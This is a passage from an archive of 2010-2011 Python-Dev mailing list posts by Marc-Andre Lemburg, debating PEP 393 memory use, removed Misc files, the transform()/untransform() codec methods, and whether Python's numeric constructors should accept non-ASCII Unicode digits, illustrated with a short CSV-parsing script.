take a French text with say 10mio code points. This would end up
appearing in memory as 3 copies on Windows: one copy stored as UCS2 (20MB),
one as Latin-1 (10MB) and one as UTF-8 (probably around 15MB, depending
on how many accents are used). That's a saving of -10MB compared to
today's implementation :-)

Martin v. Löwis wrote:
 I have been thinking about Unicode representation for some time now.
 This was triggered, on the one hand, by discussions with Glyph Lefkowitz
 (who complained that his server app consumes too much memory), and Carl
 Friedrich Bolz (who profiled Python applications to determine that
 Unicode strings are among the top consumers of memory in Python).
 On the other hand, this was triggered by the discussion on supporting
 surrogates in the library better.
 
 I'd like to propose PEP 393, which takes a different approach,
 addressing both problems simultaneously: by getting a flexible
 representation (one that can be either 1, 2, or 4 bytes), we can
 support the full range of Unicode on all systems, but still use
 only one byte per character for strings that are pure ASCII (which
 will be the majority of strings for the majority of users).
 
 You'll find the PEP at
 
 http://www.python.org/dev/peps/pep-0393/
 
 For convenience, I include it below.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Jan 25 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] [Python-checkins] r88127 - in python/branches/py3k/Misc: README.AIX README.OpenBSD cheatsheet

2011-01-20 Thread M.-A. Lemburg
brett.cannon wrote:
 Author: brett.cannon
 Date: Thu Jan 20 20:34:35 2011
 New Revision: 88127
 
 Log:
 Remove some outdated files from Misc.
 
 Removed:
python/branches/py3k/Misc/README.AIX

Are you sure that the AIX README is outdated ? It explains some
of the details of why there are scripts like ld_so_aix which are
still needed on AIX.

python/branches/py3k/Misc/README.OpenBSD

Same here. Does OpenBSD 4.x still have the issues mentioned in the
file.

python/branches/py3k/Misc/cheatsheet

Wouldn't it be better to update this useful file (as part of your
PSF grant) ? Most of it still applies to Py3.

Regarding some other things you removed or moved:

 DSVN-Python3/Misc/maintainers.rst
 DSVN-Python3/Misc/developers.txt

Why were these removed from the source archive ? They are useful
to have around for users wanting to report bugs and are useful
to follow the development of the core team between different
Python versions.

 DSVN-Python3/Misc/python-mode.el

Why is this gone ? It's a useful file for Emacs users and usually
more recent than what you get with your Emacs installation.

 DSVN-Python3/Misc/AIX-NOTES

I guess this was renamed to README.AIX before you removed it.
See above.

 DSVN-Python3/Misc/PURIFY.README

Why is this outdated ?
Should probably be renamed to README.Purify.

 DSVN-Python3/Misc/RFD

That's a piece of Python history. These nuggets should stay
in the Python source archive, IMHO.

 DSVN-Python3/Misc/setuid-prog.c

This is useful for people writing setuid programs in Python and
avoids many of the usual pitfalls:

http://mail.python.org/pipermail/python-list/1999-April/620658.html

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Jan 20 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Tools/unicode

2011-01-03 Thread M.-A. Lemburg
Michael Foord wrote:
 On 03/01/2011 15:39, Alexander Belopolsky wrote:
 On Mon, Jan 3, 2011 at 10:33 AM, Michael
 Foordmich...@voidspace.org.uk  wrote:
 ..
 If someone knows if this tool is still used/useful then please let us
 know
 how the description should best be updated. If there are no replies I'll
 remove it.
 If you are talking about Tools/unicode/, this is definitely a very
 useful tool used to generate unicodedata and encoding modules from raw
 unicode.org files.
 The description currently reads Tools used to generate unicode database
 files. I'll update it to read:
 
 tool used to generate unicodedata and encoding modules from raw
 unicode.org files

Make that Tools for generating unicodedata and codecs from unicode.org
and other mapping files.

The scripts in that dir are not just one tool, but several tools needed
to maintain the Unicode database in Python as well as generate new
codecs from mapping files.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Jan 03 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] The fate of transform() and untransform() methods

2010-12-09 Thread M.-A. Lemburg

Alexander Belopolsky wrote:
 On Fri, Dec 3, 2010 at 1:05 PM, Guido van Rossum gu...@python.org wrote:
 On Fri, Dec 3, 2010 at 9:58 AM, R. David Murray rdmur...@bitdance.com 
 wrote:
 ..
 I believe MAL's thought was that the addition of these methods had
 been approved pre-moratorium, but I don't know if that is a
 sufficient argument or not.

 It is not.

 The moratorium is intended to freeze the state of the language as
 implemented, not whatever was discussed and approved but didn't get
 implemented (that'd be a hole big enough to drive a truck through, as
 the saying goes :-).

 Regardless of what I or others may have said before, I am not
 currently a fan of adding transform() to either str or bytes.

 
 I would like to restart the discussion under a separate subject
 because the original thread [1] went off the specific topic of the six
 new methods (2 methods x 3 types) added to builtins shortly before 3.2
 beta was released. [2]  The ticket that introduced the change is
 currently closed [3] even though the last message suggests that at
 least part of the change needs to be reverted.

That's for Guido to decide.

The moratorium, if at all, would only cover the new methods,
not the other changes (readding the codecs and fixing the
codecs.py module to work with bytes as well as Unicode), all
of which were already discussed at length in several previous
discussion, on tickets and on python-dev.

I don't see much point in going through the same discussions
over and over again. Fortunately, I'm on vacation next week,
so don't have to go through all this again ;-)

Cheers,
-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Dec 09 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] The fate of transform() and untransform() methods

2010-12-09 Thread M.-A. Lemburg


Michael Foord wrote:
 On 09/12/2010 15:03, M.-A. Lemburg wrote:
 Alexander Belopolsky wrote:
 On Fri, Dec 3, 2010 at 1:05 PM, Guido van Rossumgu...@python.org 
 wrote:
 On Fri, Dec 3, 2010 at 9:58 AM, R. David
 Murrayrdmur...@bitdance.com  wrote:
 ..
 I believe MAL's thought was that the addition of these methods had
 been approved pre-moratorium, but I don't know if that is a
 sufficient argument or not.
 It is not.

 The moratorium is intended to freeze the state of the language as
 implemented, not whatever was discussed and approved but didn't get
 implemented (that'd be a hole big enough to drive a truck through, as
 the saying goes :-).

 Regardless of what I or others may have said before, I am not
 currently a fan of adding transform() to either str or bytes.

 I would like to restart the discussion under a separate subject
 because the original thread [1] went off the specific topic of the six
 new methods (2 methods x 3 types) added to builtins shortly before 3.2
 beta was released. [2]  The ticket that introduced the change is
 currently closed [3] even though the last message suggests that at
 least part of the change needs to be reverted.
 That's for Guido to decide.

 
 Well, Guido *already* said no to transform / untransform in the previous
 thread.

I'm not sure he did and asked for clarification (see attached email).

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Dec 09 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
---BeginMessage---
Guido van Rossum wrote:
 On Fri, Dec 3, 2010 at 9:58 AM, R. David Murray rdmur...@bitdance.com wrote:
 On Fri, 03 Dec 2010 11:14:56 -0500, Alexander Belopolsky 
 alexander.belopol...@gmail.com wrote:
 On Fri, Dec 3, 2010 at 10:11 AM, R. David Murray rdmur...@bitdance.com 
 wrote:
 ..
 Please also recall that transform/untransform was discussed before
 the release of Python 3.0 and was approved at the time, but it just
 did not get implemented before the 3.0 release.


 Can you provide a link?  My search for transform on python-dev came out with

 It was linked from the issue, if I recall correctly.  I do remember
 reading the thread from the python-3000 list, linked by someone
 somewhere :)

 http://mail.python.org/pipermail/python-dev/2010-June/100564.html

 where you seem to oppose these methods.  Also, new methods to builtins

 It looks to me like I was agreeing that transform/untrasnform should
 do only bytes-bytes or str-str regardless of what codec name you
 passed them.

 fall under the language moratorium (but can be approved on a
 case-by-case basis):

 http://www.python.org/dev/peps/pep-3003/#case-by-case-exemptions

 Is there an effort to document these exceptions?  I expected such
 approvals to be added to PEP 3003, but apparently this was not the
 case.

 I believe MAL's thought was that the addition of these methods had
 been approved pre-moratorium, 

Indeed.

 but I don't know if that is a
 sufficient argument or not.
 
 It is not.
 
 The moratorium is intended to freeze the state of the language as
 implemented, not whatever was discussed and approved but didn't get
 implemented (that'd be a hole big enough to drive a truck through, as
 the saying goes :-).

Sure, but those two particular methods only provide interfaces
to the codecs sub-system without actually requiring any major
implementation changes.

Furthermore, they help ease adoption of Python 3.x (quoted from
PEP 3003), since the functionality they add back was removed from
Python 3.0 in a way that makes it difficult to port Python2
applications to Python3.

 Regardless of what I or others may have said before, I am not
 currently a fan of adding transform() to either str or bytes.

How should I read this ? Do want the methods to be removed again
and added back in 3.3 ?

Frankly, I'm a bit tired of constantly having to argue against
cutting down the Unicode and codec support in Python3.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Dec 06 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software

Re: [Python-Dev] The fate of transform() and untransform() methods

2010-12-09 Thread M.-A. Lemburg
Alexander Belopolsky wrote:
 On Thu, Dec 9, 2010 at 10:03 AM, M.-A. Lemburg m...@egenix.com wrote:
 Alexander Belopolsky wrote:
 ..
  The ticket that introduced the change is
 currently closed [3] even though the last message suggests that at
 least part of the change needs to be reverted.

 That's for Guido to decide.

 The decision will probably rest with the release manager, but Guido
 has clearly voiced his opinion. 

FYI: Georg explicitly asked me whether I would have the patch ready
for 3.2 and since I didn't have time to work on it, he volunteered
to implement it, which I'd like to thank him for !

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Dec 09 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] transform() and untransform() methods, and the codec registry

2010-12-06 Thread M.-A. Lemburg
Guido van Rossum wrote:
 On Fri, Dec 3, 2010 at 9:58 AM, R. David Murray rdmur...@bitdance.com wrote:
 On Fri, 03 Dec 2010 11:14:56 -0500, Alexander Belopolsky 
 alexander.belopol...@gmail.com wrote:
 On Fri, Dec 3, 2010 at 10:11 AM, R. David Murray rdmur...@bitdance.com 
 wrote:
 ..
 Please also recall that transform/untransform was discussed before
 the release of Python 3.0 and was approved at the time, but it just
 did not get implemented before the 3.0 release.


 Can you provide a link?  My search for transform on python-dev came out with

 It was linked from the issue, if I recall correctly.  I do remember
 reading the thread from the python-3000 list, linked by someone
 somewhere :)

 http://mail.python.org/pipermail/python-dev/2010-June/100564.html

 where you seem to oppose these methods.  Also, new methods to builtins

 It looks to me like I was agreeing that transform/untrasnform should
 do only bytes-bytes or str-str regardless of what codec name you
 passed them.

 fall under the language moratorium (but can be approved on a
 case-by-case basis):

 http://www.python.org/dev/peps/pep-3003/#case-by-case-exemptions

 Is there an effort to document these exceptions?  I expected such
 approvals to be added to PEP 3003, but apparently this was not the
 case.

 I believe MAL's thought was that the addition of these methods had
 been approved pre-moratorium, 

Indeed.

 but I don't know if that is a
 sufficient argument or not.
 
 It is not.
 
 The moratorium is intended to freeze the state of the language as
 implemented, not whatever was discussed and approved but didn't get
 implemented (that'd be a hole big enough to drive a truck through, as
 the saying goes :-).

Sure, but those two particular methods only provide interfaces
to the codecs sub-system without actually requiring any major
implementation changes.

Furthermore, they help ease adoption of Python 3.x (quoted from
PEP 3003), since the functionality they add back was removed from
Python 3.0 in a way that makes it difficult to port Python2
applications to Python3.

 Regardless of what I or others may have said before, I am not
 currently a fan of adding transform() to either str or bytes.

How should I read this ? Do want the methods to be removed again
and added back in 3.3 ?

Frankly, I'm a bit tired of constantly having to argue against
cutting down the Unicode and codec support in Python3.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Dec 06 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Python and the Unicode Character Database

2010-12-03 Thread M.-A. Lemburg
Alexander Belopolsky wrote:
 On Thu, Dec 2, 2010 at 5:58 PM, M.-A. Lemburg m...@egenix.com wrote:
 ..
 I will change my mind on this issue when you present a
 machine-readable file with Arabic-Indic numerals and a program capable
 of reading it and show that this program uses the same number parsing
 algorithm as Python's int() or float().

 Have you had a look at the examples I posted ? They include texts
 and tables with numbers written using east asian arabic numerals.
 
 Yes, but this was all about output.  I am pretty sure TeX was able to
 typeset Qur'an in all its glory long before Unicode was invented.
 Yet, in machine readable form it would be something like {\quran 1}
 (invented directive).   I have asked for a file that is intended for
 machine processing, not for human enjoyment in print or on a display.
  I claim that if such file exists, the program that reads it does not
 use the same rules as Python and converting non-ascii digits would be
 a tiny portion of what that program does.

Well, programs that take input from the keyboards I posted in this
thread will have to deal with the digits. Since Python's input()
accepts keyboard input, you have your use case :-)

Seriously, I find the distinction between input and output forms
of numerals somewhat misguided. Any output can also serve as input.
For books and other printed material, images, etc. you have scanners
and OCR. For screen output you have screen readers. For spreadsheets
and data, you have CSV, TSV, XML, etc. etc. etc.

Just for the fun of it, I created a CSV file with Thai and Dzongkha
numerals (in addition to Arabic ones) using OpenOffice. Here's the
cut and paste version:


Numbers in various scripts  

Arabic  ThaiDzongkha
1   ๑   ༡
2   ๒   ༢
3   ๓   ༣
4   ๔   ༤
5   ๕   ༥
6   ๖   ༦
7   ๗   ༧
8   ๘   ༨
9   ๙   ༩
10  ๑๐  ༡༠
11  ๑๑  ༡༡
12  ๑๒  ༡༢
13  ๑๓  ༡༣
14  ๑๔  ༡༤
15  ๑๕  ༡༥
16  ๑๖  ༡༦
17  ๑๗  ༡༧
18  ๑๘  ༡༨
19  ๑๙  ༡༩
20  ๒๐  ༢༠


And here's the script that goes with it:

import csv
c = csv.reader(open('Numbers-in-various-scripts.csv'))
headers = [c.next() for i in range(3)]
while c:
print [int(unicode(x, 'utf-8')) for x in c.next()]

and the output using Python 2.7:

[1, 1, 1]
[2, 2, 2]
[3, 3, 3]
[4, 4, 4]
[5, 5, 5]
[6, 6, 6]
[7, 7, 7]
[8, 8, 8]
[9, 9, 9]
[10, 10, 10]
[11, 11, 11]
[12, 12, 12]
[13, 13, 13]
[14, 14, 14]
[15, 15, 15]
[16, 16, 16]
[17, 17, 17]
[18, 18, 18]
[19, 19, 19]
[20, 20, 20]

If you need more such files, I can generate as many as you like ;-)
I can send the OOo file as well, if you like to play around with it.

I'd say: case closed :-)

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Dec 03 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
Numbers in various scripts,,
,,
Arabic,Thai,Dzongkha
1,๑,༡
2,๒,༢
3,๓,༣
4,๔,༤
5,๕,༥
6,๖,༦
7,๗,༧
8,๘,༨
9,๙,༩
10,๑๐,༡༠
11,๑๑,༡༡
12,๑๒,༡༢
13,๑๓,༡༣
14,๑๔,༡༤
15,๑๕,༡༥
16,๑๖,༡༦
17,๑๗,༡༧
18,๑๘,༡༨
19,๑๙,༡༩
20,๒๐,༢༠
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Python and the Unicode Character Database

2010-12-02 Thread M.-A. Lemburg
Martin v. Löwis wrote:
 Now, one may wonder what precisely a possibly signed floating point
 number is, but most likely, this refers to

 floatnumber   ::=  pointfloat | exponentfloat
 pointfloat::=  [intpart] fraction | intpart .
 exponentfloat ::=  (intpart | pointfloat) exponent
 intpart   ::=  digit+
 fraction  ::=  . digit+
 exponent  ::=  (e | E) [+ | -] digit+
 digit  ::=  0...9

 I don't see why the language spec should limit the wealth of number
 formats supported by float().
 
 If it doesn't, there should be some other specification of what
 is correct and what is not. It must not be unspecified.

True.

 It is not uncommon for Asians and other non-Latin script users to
 use their own native script symbols for numbers. Just because these
 digits may look strange to someone doesn't mean that they are
 meaningless or should be discarded.
 
 Then these users should speak up and indicate their need, or somebody
 should speak up and confirm that there are users who actually want
 '١٢٣٤.٥٦' to denote 1234.56. To my knowledge, there is no writing
 system in which '١٢٣٤.٥٦e4' means 12345600.0.

I'm not sure what you're after here.

 Please also remember that Python3 now allows Unicode names for
 identifiers for much the same reasons.
 
 No no no. Addition of Unicode identifiers has a well-designed,
 deliberate specification, with a PEP and all. The support for
 non-ASCII digits in float appears to be ad-hoc, and not founded
 on actual needs of actual users.

Please note that we didn't have PEPs and the PEP process at the
time. The Unicode proposal predates and in some respects inspired
the PEP process.

The decision to add this support was deliberate based on the desire
to support as much of the nice features of Unicode in Python as
we could. At least that was what was driving me at the time.

Regarding actual needs of actual users: I don't buy that as an
argument when it comes to supporting a standard that is meant
to attract users with non-ASCII origins.

Some references you may want to read up on:

http://en.wikipedia.org/wiki/Numbers_in_Chinese_culture
http://en.wikipedia.org/wiki/Vietnamese_numerals
http://en.wikipedia.org/wiki/Korean_numerals
http://en.wikipedia.org/wiki/Japanese_numerals

Even MS Office supports them:

http://languages.siuc.edu/Chinese/Language_Settings.html

 Note that the support in float() (and the other numeric constructors)
 to work with Unicode code points was explicitly added when Unicode
 support was added to Python and has been available since Python 1.6.
 
 That doesn't necessarily make it useful. Alexander's complaint is that
 it makes Python unstable (i.e. changing as the UCD changes).

If that were true, then all Unicode database (UCD) changes would make
Python unstable. However, most changes to existing code points in the UCS
are bug fixes, so they actually have a stabilizing quality more than
a destabilizing one.

 It is not a bug by any definition of bug
 
 Most certainly it is: the documentation is either underspecified,
 or deviates from the implementation (when taking the most plausible
 interpretation). This is the very definition of bug.

The implementation is not a bug and neither was this a bug in the
2.x series of the Python documentation. The Python 3.x docs apparently
introduced a reference to the language spec which is clearly not
capturing the wealth of possible inputs.

So, yes, we're talking about a documentation bug, but not an
implementation bug.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Nov 29 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Python and the Unicode Character Database

2010-12-02 Thread M.-A. Lemburg
Martin v. Löwis wrote:
 [...]
 For direct entry by an interactive user, yes. Why are some people in
 this discussion thinking only of direct entry by an interactive user?
 
 Ultimately, somebody will have entered the data.

I don't think you really believe that all data processed by a
computer was eventually manually entered by a someone :-)

I already gave you a couple of examples of how such data can
end up being input for Python number constructors. If you are
still curious, please see the Wikipedia pages I linked to,
or have a look at these keyboards:

http://en.wikipedia.org/wiki/File:KB_Arabic_MAC.svg
http://en.wikipedia.org/wiki/File:Keyboard_Layout_Sanskrit.png
http://en.wikipedia.org/wiki/File:800px-KB_Thai_Kedmanee.png
http://en.wikipedia.org/wiki/File:Tibetan_Keyboard.png
http://en.wikipedia.org/wiki/File:KBD-DZ-noshift-2009.png

(all referenced on http://en.wikipedia.org/wiki/Keyboard_layout)

and then compare these to:

http://www.unicode.org/Public/5.2.0/ucd/extracted/DerivedNumericType.txt

Arabic numerals are being used a lot nowadays in Asian countries,
but that doesn't mean that the native script versions are not
being used anymore.

Furthermore, data can well originate from texts that were written
hundreds or even thousands of years ago, so there is plenty of
material available for processing.

Even if not entered directly, there are plenty of ways to convert
Arabic numerals (or other numeral systems) to the above forms,
e.g. in MS Office for Thai:

http://office.microsoft.com/en-us/excel-help/convert-arabic-numbers-to-thai-text-format-HP003074364.aspx

Anyway, as mentioned before: all this is really besides the point:

If we want to support Unicode in Python, we have to also support
conversion of numerals declared in Unicode into a form that can
be processed by Python. Regardless of where such data originates.

If we were not to follow this approach, we could just as well
decide not support support reading Egyptian Hieroglyphs based
on the argument that there's no keyboard to enter them...

http://www.unicode.org/charts/PDF/U13000.pdf  :-)

(from http://www.unicode.org/charts/)

 Input from an existing text file, as I said earlier.
 
 Which *specific* existing text file? Have you actually *seen* such a
 text file?

Have you tried Google ?

http://www.google.com/search?q=١٢٣
http://www.google.com/search?q=٣+site%3Agov.lb

Some examples:

http://www.bdl.gov.lb/circ/intpdf/int123.pdf
http://www.cdr.gov.lb/study/sdatl/Arabic/Chapter3.PDF
http://www.batroun.gov.lb/PDF/Waredat2006.pdf

(these all use http://en.wikipedia.org/wiki/Eastern_Arabic_numerals)

 Direct entry at the console is a red herring.
 
 And we don't need powerhouses because power comes out of the socket.

Martin, the argument simply doesn't fit well with the discussion
about Python and Unicode.

We introduced Unicode in Python not because there was a need
for each and every code point in Unicode, but because we wanted
to adopt a standard which doesn't prefer any one way of writing
things over another.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Dec 02 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Python and the Unicode Character Database

2010-12-02 Thread M.-A. Lemburg
Eric Smith wrote:
 The current behavior should go nowhere; it is not useful. Something very
 similar to the current behavior (but done correctly) should go into the
 locale module.
 
 I agree with everything Martin says here. I think the basic premise is:
 you won't find strings in the wild that use non-ASCII digits but do
 use the ASCII dot as a decimal point. And that's what float() is looking
 for. (And that doesn't even begin to address what it expects for an
 exponent 'e'.)

http://en.wikipedia.org/wiki/Decimal_mark

In China, comma and space are used to mark digit groups because dot is used as 
decimal mark.

Note that float() can also parse integers, it just returns them as
floats :-)

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Dec 02 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Python and the Unicode Character Database

2010-12-02 Thread M.-A. Lemburg
Alexander Belopolsky wrote:
 On Thu, Dec 2, 2010 at 4:14 PM, M.-A. Lemburg m...@egenix.com wrote:
 ..
 Have you tried Google ?

 
 I tried google at I could not find any plain text or HTML file that
 would use Arabic-Indic numerals.  What was interesting, though that a
 search for quran unicode (without quotes).  Brought me to
 http://www.sacred-texts.com which says that they've been using unicode
 since 2002 in their archives.  Interestingly enough, their version of
 Qur'an uses ordinary digits for ayah numbers.  See, for example
 http://www.sacred-texts.com/isl/uq/050.htm.
 
 I will change my mind on this issue when you present a
 machine-readable file with Arabic-Indic numerals and a program capable
 of reading it and show that this program uses the same number parsing
 algorithm as Python's int() or float().

Have you had a look at the examples I posted ? They include texts
and tables with numbers written using east asian arabic numerals.

Here's an example of a a famous Chinese text using Chinese numerals:

http://ctext.org/nine-chapters

Unfortunately, the Chinese numerals are not listed in the Category Nd,
so Python won't be able to parse them. This has various reasons, it
seems, one of them being that the numeral code points were not defined
as range of code points.

I'm sure you can find other books on mathematics in sanscrit or
arabic scripts as well.

But this whole branch of the discussion is not going to go anywhere.

The point is that we support all of Unicode in Python, not just a fragment,
and therefore the numeric constructors support all of Unicode.

Using them, it's very easy to support numbers in all kinds of variants,
whether bound to a locale or not.

Adding more locale aware numeric parsers and formatters to the
locale module, based on these APIs is certainly a good idea,
but orthogonal to the ongoing discussion, IMO.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Dec 02 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Python and the Unicode Character Database

2010-12-02 Thread M.-A. Lemburg
Terry Reedy wrote:
 On 11/29/2010 10:19 AM, M.-A. Lemburg wrote:
 Nick Coghlan wrote:
 On Mon, Nov 29, 2010 at 9:02 PM, M.-A. Lemburgm...@egenix.com  wrote:
 If we would go down that road, we would also have to disable other
 Unicode features based on locale, e.g. whether to apply non-ASCII
 case mappings, what to consider whitespace, etc.

 We don't do that for a good reason: Unicode is supposed to be
 universal and not limited to a single locale.

 Because parsing numbers is about more than just the characters used
